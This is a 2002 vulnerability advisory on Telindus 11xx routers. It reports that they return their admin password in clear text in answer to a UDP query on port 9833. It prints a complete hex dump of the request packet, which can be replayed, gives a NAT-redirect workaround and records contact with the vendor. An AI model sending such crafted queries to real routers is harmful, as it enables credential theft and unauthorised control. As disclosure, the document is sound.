Some vulnerabilities in the Telindus 11xx router series

[finelli () ieee org]

                        :::Title:::


        Some vulnerabilities in the Telindus 11xx router series

        by finelli () ieee org, kurgan () tigerteam it


                        :::Abstract:::


The 11xx router series by Telindus (http://www.telindus.com) has a very
serious remotely exploitable compromise, due to the fact that an
intruder may mimic the behaviour of a desktop management application,
thus getting control of the router.


                        :::The Problem:::


The 11xx router series has a management program, freely downloadable
from the Telindus site, that allows to remotely administer the router.

This program tries to discovery router boxes in the LAN through UDP
broadcast. Next it sends another different UDP unicast packet to the
answering boxes, to which the router answers with an UDP packet that
contains, among the others, the software revision number, the router
name and the password for accessing the device.

All the information are clear text. All the traffic happens on UDP port
9833.

It is possible to exploit this behaviour in a billion ways: on a LAN it
is enough to download and run the administration tool while simply 
sniffing the traffic. On a WAN it is enough to craft an hand-made packet 
that queries the router in the same way the management program does.

As an example, this is the complete dump (with the Ethernet frame) of a
``request'' packet. The payload is the last 62 bytes, beginning from
``19 73 04'', the sender address is 172.16.0.16 and the router (recipient)
is 172.16.0.253:

00 60 6C 1D BD 7E 00 00 86 60 62 F7 08 00 45 00
00 52 01 52 00 00 80 11 E0 1B AC 10 00 10 AC 10
00 FD 26 69 26 69 00 3E A8 DA 19 73 04 17 73 30
00 01 00 01 01 00 01 01 01 02 01 33 01 13 01 16
04 08 04 15 01 0D 01 0E 01 14 40 03 40 04 01 26
01 27 01 28 01 30 01 44 42 05 42 22 04 18 FF FF

This is the dump of an ``answer'' packet (with the Ethernet frame). The
payload is the last 204 bytes, beginning from ``19 73 04''. The password
has been replaced by ``x''

00 00 86 60 62 F7 00 60 6C 1D BD 7E 08 00 45 00
00 E0 25 9D 00 00 63 11 D8 42 AC 10 00 FD AC 10
00 10 26 69 26 69 00 CC 00 00 19 73 04 17 73 30
00 03 00 01 01 00 00 05 45 51 43 41 59 01 01 00
0D xx xx xx xx xx xx xx xx xx xx xx xx xx 01 02
00 32 4E 44 31 30 36 30 56 45 2D 54 4C 49 2C 20
76 65 72 20 35 2E 33 2E 31 31 42 3B 54 68 75 20
44 65 63 20 20 36 20 31 36 3A 33 36 3A 33 33 20
32 30 30 31 01 33 00 02 00 3C 01 13 00 06 00 60
6C 1D BD 7E 01 16 00 06 00 00 86 60 62 F7 04 08
00 02 00 01 04 15 00 02 00 FF 01 0D 00 04 00 00
00 00 01 0E 00 04 00 00 00 00 01 14 00 02 00 00
40 03 00 02 00 00 40 04 00 02 00 00 01 26 00 00
01 27 00 00 01 28 00 00 01 30 00 02 00 02 01 44
00 00 42 05 00 00 42 22 00 00 04 18 00 00


                        :::The Solution:::


We have not been able to understand if this ``feature'' can be disabled.
Otherwise, it seems that the only solution would be to filter the traffic
on UDP port 9833 directed to the box.

A quick and dirty workaround is to redirect WAN traffic to port
9833/udp to another IP address in the LAN, better if it's an unused one.
This can be achieved by telnetting to the router, logging in, and
issuing the followind command: ``add auto udp 9833 9833 9833 10.0.0.10'',
where 10.0.0.10 is some unused IP address in your LAN. This sets up a
static NAT rule that redirects traffic entering WAN interface. Then, you
must also enter the command ``save'' to save your configuration to NVRAM.
You can optionally check the status of the NAT table by issuing ``show
auto''. If you made some mistake, you can ``del auto <number>'', and then
retry. Maybe there are better methods, we used this one because of we
already knew how to use the command ``auto''.


                        :::Notes:::


We contacted Telindus, through their Italian office. They told us that
they are actively working on this issue. We told them that after a month
we would have informed the security community of the problem.

Telindus told us that a beta version of the firmware should be available
soon. Last but not least, the banner of the router has the word Arescom
in it, so perhaps other devices from that vendor are exploitable: we
have none at our disposition, so we have not been  able to check.


                        :::Acknowledgements:::


Permission to copy or publish this note is granted as long as the
copyright notice is kept intact.

        (C) 2002 finelli () ieee org, kurgan () tigerteam it

This document is freely available from:

        http://www.tigerteam.it
        http://www.trustnet.it


                        :::Disclaimer:::


Strangely enough we have been able to discover this problem in spite of
DMCA and similar initiatives, since we did not even need to reverse
engineer the code of any application: we were simply monitoring the
network for totally unrelated issues and we happened to log a ``strange
communication'' on the UDP port 9833. Notice that the payload is in
clear text and that the juxtaposition of the router name and of a text
string leaves little to imagination.


NO WARRANTY

This document is furnished on an "as is" basis. We make no warranties
of any kind, either expressed or implied as to any matter including,
but not limited to, warranty of fitness for a particular purpose or
merchantability, exclusivity or results obtained from use of the
material. We do not make any warranty of any kind with respect to
freedom from patent, trademark, or copyright infringement.